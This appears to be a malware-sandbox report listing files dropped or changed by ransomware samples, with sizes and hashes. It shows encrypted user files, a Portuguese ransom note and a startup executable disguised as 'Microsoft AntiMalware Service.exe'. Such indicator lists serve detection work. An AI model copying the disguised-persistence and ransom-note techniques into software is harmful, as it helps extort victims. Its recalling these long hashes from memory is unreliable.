SHA51278657d846dc537329166327e009d1b525e831f60b5c67bf83882498d06f273b95f575c2ef2d17aaa6a55c3a788f176d13464bb62317bdbfd55610cb9d3092970
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\1b2443ce-c459-41ca-9cea-53b49774f82e.dmp
Filesize3.6MB
MD56a721582f3cc259f4d7ff63563517514
SHA18076b80686bb6f2a71e2e5bb8db5eb2bd6896285
SHA256a3c5a5e17c381c922dc1692061e23b7a1921c14b08156f295e39ce56931ab951
SHA512372039829d8b31d561a466d77c1c4038fd27e0a129860ae64a4ed177a00a4bad7aa81342f744eeac6f6284d132df853c76031d9950b110702efeb2e02d326777
-
Filesize
1.0MB
MD504b44160e1643d1a32de48b13b639fff
SHA1db74f21180ddb7249111942c96aa123a4f4b2dd7
SHA256ec28a1262e0b478fd8a6ba46324e64b4b9e8c3d0496b81ecec681c24626114d9
SHA5120bbf7ed2eb1743c8b1cef1a8aff5f6cfd1f720a18c2ad7a3aece35739ca377e3499a4425e354e0903d2c57338c2ebc62cff07eae153103f8e540683dbe998800
-
Filesize
1.0MB
MD55ba1c55474cd1be98c9414518533ae09
SHA181b1bd17119ece2fcbd39eb3ab0c287fe7929913
SHA256c0fff07291941f412956439fb547a2d63807bc2069fdb72132f807a8fd9e1c70
SHA51299225ee1429fc6ef7f62d77238aca2cddbd7edf7572350fc6925904590490a27106c49af263489d709b7693ca32ba28dd2fda3258d8216eca4e2ce228a3a0029
-
Filesize
28KB
MD57330d28cf5938b8185ac73b88af48bf3
SHA1c33c6aead2823174eafd2defa049efa44f33f57c
SHA256ecc61327469ff8a8a7959d18135b1f772092ece653891a86cead35dbb942cd5e
SHA5126a8348c57a1b240c2cfdfd9bf1d9cb95f4940e6a95c722b5a91e66518a6f8e8021144e111416739e39eabce61f67db74999ae16cc9eac3ec7eaea8622da2b502
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\id[fF0yoY63].[[email protected]].iconcache_256.db.teslarvng2
Filesize3.0MB
MD503842be15bd742ad8065485e2c5de264
SHA1e1e788c7b42b40fc4c83beeafc883ba9844680ac
SHA2564b829129559440a112e1e59ed08fce09f8236a91e5cafe088e07622eb9d6c9be
SHA51236dead7c72223386fa6147cca234246def1883f14ed350e4d777c4b7e6e86bb53fdf045afd6f7c3116ec5030a3660b1842d134f8303d19437edd3d20b93749f3
-
Filesize
49KB
MD5b6bc382b49386ddf12de4235f5f03537
SHA13069113e2556aa3b4e750d92ebe736e7ac979a3d
SHA2561b4d604cfd1bb7c01eeea182c966393216989e44b73e5b80600818b1560a9f7d
SHA512a5e749fd630b5824ce55408333f02f4fe7b61d85e50ef459f4a817e32a1e9736c5f6e8b5c812e94f7ad9b0c653473e0c19f8838a0538b2a8a863ec9f69b4ab18
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\Projects\Projects.json
Filesize2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\Projects\Projects.json
Filesize238B
MD52c8a57fc60043e5ed8db124167c41a0c
SHA10ea31b89e89f0e853743a487e2ab9d4b0ead8188
SHA256beccbc85cd09a27ebef5a51b7898c96d83e73a0347abeef7dcdbd5dd70c2d29c
SHA512be74b1f5732412d7ebfd793c520c918dac4e4d27a82c8bfe56d3de39a1178524fc4f4c67767ef4621b6bf20fffd773b9d92fdff4dd1b15aaefb2851421def1be
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\cloudCommunitySettings.json
Filesize2KB
MD5f4e4a03ebd0ab3a953c56a300d61d223
SHA197a9acf22c3bdd6989d7c120c21077c4d5a9a80e
SHA25652bfb22aa2d7b0ce083d312fb8fa8dcda3063207186f99fc259aebd9064cbedc
SHA51212aa71eea45720a4d7d057da0b662635671e4cd165ad2e0d30a3d2a43950b47dd60c26c1bbbe049418f815850e571b8d93e4c8b8cbbd686abc3cf7926ba719c2
-
Filesize
1.7MB
MD5d39f8562e451df89a96280bba3c5c4eb
SHA199b121b6742e847deff2ac40f1a5bec53a81e66a
SHA2565c5b71a170875d58ae8d9a9b9df8a56eb5655f423dab4f692560164f3bde3730
SHA5123c3a68906bd01e5c003937befa6a896aded5f1662cfb9d12c94c5fe42de6111521111b5fb51cefe66eceecb9f327211d2e5bda9db13a1f72d95a8db5b69dbc9d
-
Filesize
544KB
MD5deb81f64d4e333520e5232caae42149c
SHA14b39b9e6ece57477bab7501f533345ca38f141cf
SHA2564b4dda98860650271172e4d69812eee2c30cf2b20dc30ef47aed5987e8d01f14
SHA5123f0e22ea0515d0d1f160e58a5ec28d8fa80c82580383c1879848ccc2a455fe31466a26a3e02bc9b70d7b4826cfdcdad7fcaf0c9fe12729aa53a849ee1ed3fcaa
-
Filesize
76KB
MD50e362e7005823d0bec3719b902ed6d62
SHA1590d860b909804349e0cdc2f1662b37bd62f7463
SHA2562d0dc6216f613ac7551a7e70a798c22aee8eb9819428b1357e2b8c73bef905ad
SHA512518991b68496b3f8545e418cf9b345e0791e09cc20d177b8aa47e0aba447aa55383c64f5bdaca39f2b061a5d08c16f2ad484af8a9f238ca23ab081618fba3ad3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
326KB
MD52c3e84b979742a1584d7896c6f32e068
SHA1811772a8a5e2ee40ccdb4f75cec2375e03425691
SHA25685e55931aeab48b318f6e4af1d47f5e82bb777996f16689a33ad2dba2ac0ea53
SHA512d9c71adf62aad7e9032b33beb71c6bdfa09e28031e9cf2f1d9ee8844569dd046b1cf3d6c2f8ae0154accca1059e6eb0d16cf385e30a61dcbfd36540654ddde5f
-
Filesize
8KB
MD5180045a862c92f034ae1a93003eb0507
SHA1f5d2e785a3b5579e73ec8d5e60efc249c37336d6
SHA256a496fec1e147ac43c48bf7bb92dc9863257b731133a9eb55e4b3f432614e9b09
SHA5129dbea93dafb5077b045d8c8b704f57385999c2ee2c02ded55c9d64064225a806e9e456a5b95c517d699abb77f7caf3a50e1cc2e92bc7ffa987e4c0d53ae26b1c
-
Filesize
299KB
MD53e30c6b2fb5c8d27c042a6c1e7ffbb09
SHA1e1351c89f587a991942de0e1238e39a75b3afe3a
SHA256dd1df7257e33662197617b1f35c4d60df8ef8357581a3d9742c237b95a11cd41
SHA512665f3e7885b2c9ce0a666e582db0f771ea77023532e408737be86e05da816d2d1464a514f0b3cfa47a93b54de91daf66125696be8bade9e4ff24aa5f334bced1
-
Filesize
299KB
MD58c338b4e655f32c57999d14c87de511c
SHA12e35803b19228e99b733618910cb585be0f295de
SHA2569b37613e74aaa3d31014020691079ece6dd38807155f7e2555308146a19ce022
SHA51282b79be9f587c4293d644b714f36dfcc29ac28ff599478480a048756db3ec04d18024fc7ca20d8ff61dc9ca920e487045a379c55fdc4a04a31248af6f6abd714
-
Filesize
230KB
MD5b6c444adc655ad619137685023f5f3cd
SHA165bcfb1d22428518389c0b7f665d23f544f88db1
SHA256e8c5e70c0fda14b774e373dfbaa5204efc4ea8fdb620b40c94ae177bca22122d
SHA512a8e9ab346462a99d581c28381f5ed47e3ac9261ac57f1d507bb72065fa0d2c15db69e9b5f8271bcfc39676d1f5d66876787fd958051c8047cc8aacb712e771ff
-
Filesize
644B
MD5e3535c6f34b20e88ddebeca6c0a0cc34
SHA1cf5e4c4f724e9420915fe6de617803f29eb511c6
SHA256b1277bb35b229c5ac83dfa777b8f5089dde5bae1bb1c97822198a05bdf7b732f
SHA51251e6a331976c178f78af5a4ffc6fa51f3752a13ccd9e04e307710984e4f93fbd07f90c998728a4d826fdebafa35c105a4164210acdbbaf9ec609b46b6684b9bd
-
Filesize
539KB
MD57f68ad4412a8feaffb501785944e8556
SHA1620f9e5152b19de95b4a7a67f0541b55d389be27
SHA2567b8f89ef90149b043ec2b1060d4409b12f1702e8f01a17db8a5938bf60f71c54
SHA512fe693ed866f7caabc80f0c9f297e4d7980f181287caffc4fc5a677f3c38a4a7b7f80d7864818c166447ca050c9707986b5008d1962667c0c701bfe5a6841db16
-
Filesize
134KB
MD5ae98ac5ae664746f8c6355e50413cfb8
SHA1afecab13d82ac49bbb6484fceee7f3f22e178f53
SHA256b7aa9a6bb4bdf4b86c1e812dc4f599a227e1a1c57ff39720fe54c9b428742856
SHA51250cfc44bea52f560ce76637e585d76c26c8582db0d1f9dee9094af9ef614034df36e574f35213e4b3624a2e48e5d76d5c04eb30da439a1642cfe4f02cd751d48
-
Filesize
89KB
MD5401c24d25432f41d6fa64ad6984137c5
SHA105a6b3bc2ae6987faead0fff7ff35b08abc38335
SHA2561241b516276689ec72f70a96056e94e48835cf4bc9d783af2f76daee80c446a7
SHA512c8cc27c57f258fb3aaf597178e9f093a4f9abb28f48ffcf28b5f03007670388f7fc69df789785e96c2d21a0ff8bd5f30528dc0ee403cc67657e6f6a408b3e818
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft AntiMalware Service.exe
Filesize589KB
MD5ff15297be3eb53d585ad969afb4ea899
SHA1537c5647d1ba81df65f19b2bf8d4847e6fb8257b
SHA256c8582eee29280f9f356784fe4aac69364e010aa8dd928d7a18f6297cc8690bcc
SHA512e2bacf95a0d4bd7c2989c7a83778fd316255f6e7c2da328758618db07e336bf5be8e498ce8b0fa9203a6a5f5ae70bbc92d26b02c02d5a2b91d1c85b42e61bb48
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\COMPUTADOR CRIPTOGRAFADO ENTRE EM CONTATO!
Filesize687B
MD52c4205536de5641eda987766916c73a5
SHA13b8589fd534df69b855b081b65b7496a83c0fca7
SHA2569d0052332bb64a7dec17611122fa179a008112ba89e214606f837360ee17af34
SHA5125c17feaa8d9e62eedfbf4a22b04d35cae57b36e2f9d36f45d37c278d5f5369d65f91f2607e52d70bb11d6b7390bb604e5ef3f6b3781a587d1809fc0052000d00
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\COMPUTADOR CRIPTOGRAFADO ENTRE EM CONTATO!
Filesize685B
MD5fec815a639eb5d1687586396e37c9910
SHA1dc4f88b3fde358b98d41402de9e3a98bec062469
SHA25635fd9c8470eacf47035270e6bceef7f4723a73e1edec6f8ce39268a9787a6a3f
SHA512df6ca39b52e2787c15dad4f44f661f59eb6882f1be52ea412ab2cc797726bbee8a68153255184d4e52ad5a7af3548867b6e09073d15fbda77b40976cbcee5982
-
Filesize
89KB
MD537a5389f3aec6535037e968ca6d5d823
SHA19f9a07e236a51094a9f1b2405c05d5a4e7392b7c
SHA256a766cd781cb29632daa6407bf44407a579291675171f0cfc1b53a27f05d63085
SHA5122455b0bd0862e2859be98befe2c9ca63fd8d21c7f07b2bf252783233e871674259774d29225f9f00e677eda0c5a217ab66eae3d3f532728446f586662d93bd6d
-
Filesize
16B
MD5f316115f4a5591cf5c026e5c08e74718
SHA188292ab396630f760e2e52c0cc83b0afad6a9b92
SHA2569f0becfaaaf4d7f6ccd71c9067cab0385d2368a54f5d39db4a4c1d70072a60ba
SHA512b776fff7c0314f90f14806c502c8410c81e156418c1599221b68ff7105124fb173a164318c9b6121d923994f453e33b153bf132a3b5d8fb3eea5fe72efefb69b
-
Filesize
32KB
MD5c07a2f369d6267b428581735d5a779a6
SHA1092ca0ddf1c61a5b801aae67c3be57b7808dc5c4
SHA25646eb727d03f143844b3c2f52d20af603462acdcd89d537407a19cde78af8846d
SHA512c60c4b4ccde11b0e27dcbb87bc5c7ae7819aa038883cb97fa170f88fd09621d2576415282f675cd4a870a6ec57bcb85a93b584a5efd3568be5f83cd537756d31
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
Filesize48KB
MD5eac8da9114da3c22fc1422f7063de7a8
SHA12992d514bf0c9ad652a86eb33d20c62c010d38a8
SHA2569e6234d49b6ff773b75bd180e8f73382734beea894999a9ca3233ddbcc155d18
SHA512c0ec7df8650cda7ad783c8f90c81e30cad4a6552e45eedf6f250aa52e0d4b593f0afe2baf4c16ab7b25a421c4925710502c0af2f05502b85e2a4bf0e5ad41307
-
Filesize
2.3MB
MD59a0bec9b25f89c3040a2414ec7086a37
SHA13421611d11a840153c7acc4db66c5e32a9e5290b
SHA256b68cff95d35407fc6132068d3e6978635ccebc7fa44720cd79bc7674b7b43766
SHA512f2f153004e4f0d72884c06773d2e1faa2c95edfe69ab4ec38b4cfec796082efbce4e96501ba3927bb059004759cff62460d9d0ee38840202fe22bbdc3a075eb8
-
Filesize
430KB
MD5473b91e25834b2599d6ac24d12cc3daf
SHA15f8ba03f86a7cd97fde92b68cfa46080f0146028
SHA2564f33c45655f7270d2b91f0b91b999b17a958e3d0dd1e88bf8b7d19b8e16c4a6e
SHA5129ceacceb3036269df6d126dbae82ec00767c61caa5b8571b5557c4e95909b4969bc7fcc77d8e8df33f8bd8a2cd559674d90e4f6aca6b20945973237102e7db72
-
Filesize
22.1MB
MD53923ea075db054c4b321e6e1d1a15166
SHA1054f4adadd8fdd16a9d5ae239bb6e124801418b1
SHA256dd8872182e28dfe3e94506242eff70f4a1c34b70712e626266b6d2b0945039de
SHA5125fb9e52c1efbce4df42dc55f4909d8f2b760fa4873455856e911f555fe8fa92e136eda1f517fa41f9a0d467b43c4cff4d275b8cd99fcc8fbbab74eee3e291a3a
-
Filesize
2.2MB
MD59358aa6efa96d10cc8eb60113ab2fcb5
SHA1f090f03c95e49f41eb19277e337ebb7eabf5fc4c
SHA256558b6dbcebd657b52bc9ee9d50af3a9e2d6d596f0a0b4deb06543e1e4e674e8f
SHA5127bb006a4e7c6ad128defbd26e043320f9f6ed53fa9412b2d5d3e111c8a7499eb8a3d38b014476dbc7ed9e8edd5899509351948808954b68e37fe271e9a49b584
-
C:\Users\Admin\AppData\Roaming\Trojan-Ransom.Win32.Blocker.gyoq-5f6b76c7191dbfea800aa2404e294139a05e0abc8019c928e8a582896994167f.exe
Filesize60KB
MD541bd40cdb281b604576d1a1f534efdcb
SHA14cca60c16c94cc62a1bf54a404b1547a8560a122
SHA2565f6b76c7191dbfea800aa2404e294139a05e0abc8019c928e8a582896994167f
SHA512ed81cbf701b6823425a57086d1855f312a8f9d85ff92eb850cc5fb2ba668f8aaf843b76236d35fc6cce077bc33d15aad99a3ed06553556286656ee9987ec7eed
-
Filesize
76KB
MD522304341557ffd87066fd53dcfe7f4a0
SHA1b22f9ee28d65941314a055e15df8444d39cbe1f7
SHA256a43b765e32162dad5373f9dc42bf94c11f1a67c154c24623cdcceb78d9fd20b0
SHA5123210385cd053f25dba7a6b8e99ebb5b6566e24a722e78807964a7aa44250598e68196f6af2f947e2a8e855d2e659cdf4925cacd801db533176356368718b2083
-
Filesize
503KB
MD5377ad8f88b2338d0417766d0ec219492
SHA13e2478b5a342c7c5fe0b12b2303a272bc6f11542
SHA2565dbec4d651f857e08561cfe835476fccf279d94c44157b0cf3a41b09ac30bf67
SHA51283e23229105736be4532ccb387e55d3ca3ff6b7c721ad5bf81652b552d57cc90825d3b99c4b25d102ab8e9248070ea0d0ae627eb30fe725094bae92c12e99504
-
Filesize
2KB
MD5206eaf911b6f91d509a1d717c5fa5b87
SHA19457b28170b1aeb98e9656c732b05a7eeaa61fd4
SHA2567226b6fcf304e42ac188827e62d80e3da0df6b9bb2b1b7fbd3ca830cad60a922
SHA512f447c083d762b3c5459c5080ba4bc5a6e703e5a50bfe5c628eb9787dd64d5e4fea570867684eb87416a70816b05bed1ac94a0f7050063fee585b70b76ac875d7
-
Filesize
212KB
MD5c9c39d574847c3b283c5f3c9294c8bf5
SHA122639b948983b70af7fcaf31b2ae50e08e68fccf
SHA256013709e29c4d7736f31ed5c1c492e581882550eca0745e6af2a39ef4a787bba2
SHA512cf5324e3f106f5168554d7be7b298857ae1e64bd8e973fc37d9f5ca6aa49858c7e620d9783665a65f53c027cbd4a234056e7ceaf440e8e67b53fc777201cbc51
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Blocker.gen-1f884d02b8e20ce595eb81f4073ac7428818b38717645748c3cd24991573fcd4.exe
Filesize758KB
MD5621c092c4f20cee8b53edb81c7b9bba3
SHA16bf034fab91ed374ee23b22c99cee396b9629e4a
SHA2561f884d02b8e20ce595eb81f4073ac7428818b38717645748c3cd24991573fcd4
SHA5129223862c0c58c05697aad692c2862d086dda1430baef9b6b46557191e79ffe27e005b0fc74122a633929f4f0e0681975d9a324866729bb7fd4b1d708c8cb097b
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Blocker.gen-508e4e5e5c1f3a2dc3ac302bbdebf4111bb642c88264cdb67d8eefe79eea9d5e.exe
Filesize573KB
MD5505b0fbc41b7d30b65853b3b6fa8c117
SHA12352dd455bde54d27184b8d98271ee06c7508235
SHA256508e4e5e5c1f3a2dc3ac302bbdebf4111bb642c88264cdb67d8eefe79eea9d5e
SHA51230b413264b7da6e3eeb8d000aa11e0fea6c0548d970451b2b81e4abcb7337a8489701e04c0bc09dd4e99de4118238db650fcdc2d1dfc2a8828f1de571a26d734
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Blocker.gen-690a7d0423879b09d450dbe183bddf072b7599a66c890f4933114717e5bdd263.exe
Filesize770KB
MD5e04c7d125fc9b7d9ec6e9c8b0556c22e
SHA1c8b2a491b768405d82fc9d22cdcc6320b59c728c
SHA256690a7d0423879b09d450dbe183bddf072b7599a66c890f4933114717e5bdd263
SHA512a3e258832869fae46568a326df7a3e286e225db00b41078142b5c1b15b0058b8c405537f75aa98399335941a2b3b4b4d04e34349455a59287110377215f002a9
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Blocker.gen-7129b9e68d3651a62d5c091058b99edb39387da22c60a5aa2632476ab824ce16.exe
Filesize3.7MB
MD5ce1a62276b9280c8192bd46b46f6c8bb
SHA1be8b73f748e3ed7bb8b549491e58d180e9e82c67
SHA2567129b9e68d3651a62d5c091058b99edb39387da22c60a5aa2632476ab824ce16
SHA512441bfee6223f35fa36d0fe7ab45d2293ea6a17f712fc71d42a5011f629d6e49deab4244b71b1bdbec8998ff46b2929b1b026e4bd841868214340ea84d09ab405
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Blocker.gen-9440b5ca9e37624ce03a04238091c2390f11ebef50490f178a52e3170086e064.exe
Filesize809KB
MD553e2f34a267e42dec42dd20ce7f9a318
SHA189de681c22eebb143421847ec7aa98840a555465
SHA2569440b5ca9e37624ce03a04238091c2390f11ebef50490f178a52e3170086e064
SHA512dd2fd312c759875b501ba4e8201b5fa76418e81788adba88ab30fda96b953918c7aa9af5dd0245a855efa8c326bdc8688124ac5cf28b23d9363ab4a650080252
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Blocker.gen-9440b5ca9e37624ce03a04238091c2390f11ebef50490f178a52e3170086e064\Trojan.MSIL.Crypt.htyw-fcd90895e180463cdb1055387dc05515d7eb8c4df57a4f551cc0783f5a42ff28.exe
Filesize1.5MB
MD518fab364741e16debf3db39f53b94267
SHA1c010b496c861b78fb31426e622199f1d439f82f0
SHA25601e569565e27428cf91fe7f24853bdcaf10993d43ad78a946d32fcff06f586d7
SHA5129b1418bafd9712359a0d906dbe1920536f8c0ec46aa069e8af4829bc4d83dc1d25cf961b126600d4ca9c030763bcb29065cf54e4134ca738050c74d9af32a29b
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c38cbcb74d9dd769954e43cadb836599c69ecf10e1d068d70f00bc3a95028b96.exe
Filesize1.9MB
MD55bee7a6114f6504acedb192ec70bf142
SHA11f3e319d354ba5e31f82b4569b45f63367c9f0b5
SHA256c38cbcb74d9dd769954e43cadb836599c69ecf10e1d068d70f00bc3a95028b96
SHA5124ce569d7b5c95c6901f1f8c62e73d476ec81b4dedc33edc8330806035eb2ed83d7cc193900c8a135b8d8423c5dd6269b3e35a25f03d1f441fa2abf8320283730
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Crypren.gen-a43f39a2e4b9136f2ad0b3706ff858adcce1bba6ab3b7ab65c016d47cd3f7b89.exe
Filesize1.0MB
MD58566b007efe4840fba1cc4009dac4021
SHA11e50f78994dd4640a30ddfddca83bff6333dc252
SHA256a43f39a2e4b9136f2ad0b3706ff858adcce1bba6ab3b7ab65c016d47cd3f7b89
SHA512f2bce58b51c4870c97a907ca81d007aa4a3be5de59d199f571f0280140e085654e68cefc2c7793f77cee7a9e76620ee492ec22e5863f700fb4aa9aa7044fb4ab
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Cryptor.gen-693b60311e8085f10849236ff2ae6cf074c577f2cd8c325882049b873ec8629b.exe
Filesize995KB
MD58d2afa3d2cd8f3adaafd50f0618856ce
SHA1a39aadebf8ad4856edda0667d16ed441be143602
SHA256693b60311e8085f10849236ff2ae6cf074c577f2cd8c325882049b873ec8629b
SHA512057ba221feda425d7a2e104b0ac3740b6f728e04494eecfbf087da0aac1f2337ffac4c95ee7b154ce2d9abc61981a61f522ac03312eddf44b8e6df7372bbdf00
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Encoder.gen-6a280e736f87f45cf54e75b1cae457cce8946b0e018c524c480183f38afa8b50.exe
Filesize11.1MB
MD592c93f448630e732a6011d66553b8aab
SHA1a1bb5d429c0821efb3b70878e63055ce94373b88
SHA2566a280e736f87f45cf54e75b1cae457cce8946b0e018c524c480183f38afa8b50
SHA5128ee1f0b080fa2644ba422e4c1198493a3f66724be22b5e390dce06d83cdefda353dd549ea799c1dbae84caf1c04aaa314c69cedb5cd6f0f52056dc6379aa51f4
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Encoder.gen-6fd34eae74f8830037e6d3af76d4e4f24b0f28883a44c4fec579c5388913a39d.exe
Filesize14.8MB
MD5c57a048015a0726508603bc80467d06b
SHA1fa1c74a4d5d94ae7e3b7b0c106dd901bc2c6a9be
SHA2566fd34eae74f8830037e6d3af76d4e4f24b0f28883a44c4fec579c5388913a39d
SHA51253d6ed040e0f095009aab622bdd37c43e57018a7324bd10dcaeca77fe3c4c2d807ac45eee62ca0d94f1997c2aa40fe901e9e441ee993493de5c0ff7cc44c0cc6
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Encoder.gen-b54ba0258512b23f22ef05c2697ef598f3559d4c60697b661ffab28c8c0e5fa3.exe
Filesize274KB
MD5c9bbbfaaa7d396f48ec12ec09d6a8ae6
SHA14fee7173605d476977423701ee39517c7e5e8a0d
SHA256b54ba0258512b23f22ef05c2697ef598f3559d4c60697b661ffab28c8c0e5fa3
SHA51295024184f57721ff2eef6380e4114d427605fc9d620bb59dba2de40bac704357eacad5196850c8dddce8e15fd0dceeedc93ed2fef91c036d5d087018b5bda4d4
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Foreign.gen-1628073f4f208304b6160edcc7c99b0eb0598dd0013c324ddd6b9999071c6b2b.exe
Filesize10.4MB
MD57af2e3efd842460d47fbe0c968cd07cd
SHA166af71e371232803a725ae01a184803f46669da8
SHA2561628073f4f208304b6160edcc7c99b0eb0598dd0013c324ddd6b9999071c6b2b
SHA512d95a87a9a07d23d829f689441eeafb58e69600d36da3069d2520c140d6573788e14232743528bc2ccf34d23e16e3051d9567842d5b94b15ddccde959561a06c7
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Agent.gen-cd21ead0679e614f1c3eb74d7c9a6e184115c8065fea879e644707f580402d8d.exe
Filesize9.2MB
MD5e79f39b4cf0f95c952800800aa05dada
SHA1a6cc88a99ae0fa1960217559175e89e9e71ff8d7
SHA256cd21ead0679e614f1c3eb74d7c9a6e184115c8065fea879e644707f580402d8d
SHA512fa520869e37558716cd600c4ba3d62e5a4d3291b478be2f317667d3b6016cf8199656352cd16bcac4750469bec7f610e5100eb119a9bc63737b6360e2d9f1325
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.CryFile.gen-a830a4a4973acc8df892a95870ba73933cc428f9e2da64436e31686a7a786155.exe
Filesize6.3MB
MD55489e5dcb54472ef63aebb0ec43c8a00
SHA136bafd595393b62aea82285ad5ee7168dc7e05db
SHA256a830a4a4973acc8df892a95870ba73933cc428f9e2da64436e31686a7a786155
SHA5121f40e60736769ea97723b46cd7c8c81359795062eddbae1b49a7ee2326213f43cbc7b2518d1b2b45a4eeb02d25e102bc0f67d05da4771c4707c9b1fd907e4b50
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-a54408b8e9aa1463e1f86d44a42986dddce59429ccd4aa188b754c114f6c37b9.exe
Filesize328KB
MD5cce5ade37574d6dd1d67565f5b6d67f0
SHA170813ce7b325e1dc60ed3fe35d30be54f33583e2
SHA256a54408b8e9aa1463e1f86d44a42986dddce59429ccd4aa188b754c114f6c37b9
SHA51289676b3eb6e70f2c4dfdba34341d2905fe5c38c10a62b95b0937be544081193f145355f79e78f8ff55edd00bded43311a9d7f564bad5fa56f7aae77cb688dc6e
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Generic-28f4f0232383f01a81415e1d5c11d93254759260511f15924e3744be2063dafa.exe
Filesize1.3MB
MD5279899976c66b5efb027865b88d49d0a
SHA1a9883413dcca7706196d5645ee0cd8f8fb5434b7
SHA25628f4f0232383f01a81415e1d5c11d93254759260511f15924e3744be2063dafa
SHA5129f4a1e83a5731e1063f2d59affc011a26ae908859e2794781cd0947fb63cafb64b7310cc42f97ce742363e529d168ca24908e504a6429666ab4d29be570fafcf
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Generic-5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.exe
Filesize94KB
MD563f0ad9da8c823ca89c4c4ec0fce2c92
SHA189e66f83eee1e47b231c060034c55cd09cc84a98
SHA2565e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb
SHA51255365e3a80e5266ad79189ab80d82a5954e284f0ae63ac8ab387e351edb96213158bd00973a3db95b1280d919757125fad527f54e2e340e8324f3a62628159c3
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Generic-7033dbc7c2d282bae09c56c1b23b55a06ec172740fc35395f34763cf8c6623e8.exe
Filesize715KB
MD58078f053d2359f0147e98a7167c1b76c
SHA121226a88153df8852b0ecfebd701172ee050e032
SHA2567033dbc7c2d282bae09c56c1b23b55a06ec172740fc35395f34763cf8c6623e8
SHA512a3b53af6ad20dfad94a5bec4d5464dd5fd668504536ad1204d5708e1defac6bd203bc1b7a88abc9e99147c2bceca44a57e8865a6491c644d0fa6f09581a99a50
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Generic-75768b049c2604de6db876b29e47e570baba75850cc322f1abe96331abfa975f.exe
Filesize702KB
MD5a91ec7acf0d5902de0f7cb78bd2408d5
SHA1cebd771eb44d932dff4197cdcd19f86f0003e9e9
SHA25675768b049c2604de6db876b29e47e570baba75850cc322f1abe96331abfa975f
SHA51202cac15f62be2e17367cc1c1dcc59d9e9571455ce79a46e289d1d4f04066da6267e1d435b6d3ff3e3f6d582b8ffec1197fe716928512cf1f13d96184c658cd3d
-
Filesize
86KB
MD5114054313070472cd1a6d7d28f7c5002
SHA19a044986e6101df1a126035da7326a50c3fe9a23
SHA256e15d9e1b772fed3db19e67b8d54533d1a2d46a37f8b12702a5892c6b886e9db1
SHA512a2ff8481e89698dae4a1c83404105093472e384d7a3debbd7014e010543e08efc8ebb3f67c8a4ce09029e6b2a8fb7779bb402aae7c9987e61389cd8a72c73522
-
Filesize
6KB
MD54491ecfc928618ce64869c24e4d9115d
SHA157c1c8268fbd97b54817cb36e207ace9c245658d
SHA25660d29ba46e01c53948a0cca6caacf31f9ed88d50fe534a08757d6e398397dbc6
SHA5129fb5de25f61010902b84f5c1d630cd4a8230985c4e54767edbf35c33834907c425af35563e567411d7f6ac89d651edb361b6143414908dccd465ba76f901b639
-
Filesize
348KB
MD5a361972cd5ff158632b3b813f48a3582
SHA152c2230e6ee0f1664911f62f6245c2a556db8093
SHA25607153af8211e2578f12a46da6d40105386da81fadb9d0071537b8d6a5f040a6a
SHA5125971932b8bac6eb2a813af90a4941e349338ef512be3e041c00136065845e21c5ce71daec80322d8ef2ec57319cdfed462c4f4c8c91f3d493cd39149a0022f49
-
Filesize
10KB
MD578dd0c66f022a877b18c2d7443d912ba
SHA12532a3c905abaab8012170efe45c0ecb471cd01e
SHA25699282246298e33f2edd29fc5553d677ef52a60fec3da12f53670f3ca9e55a802
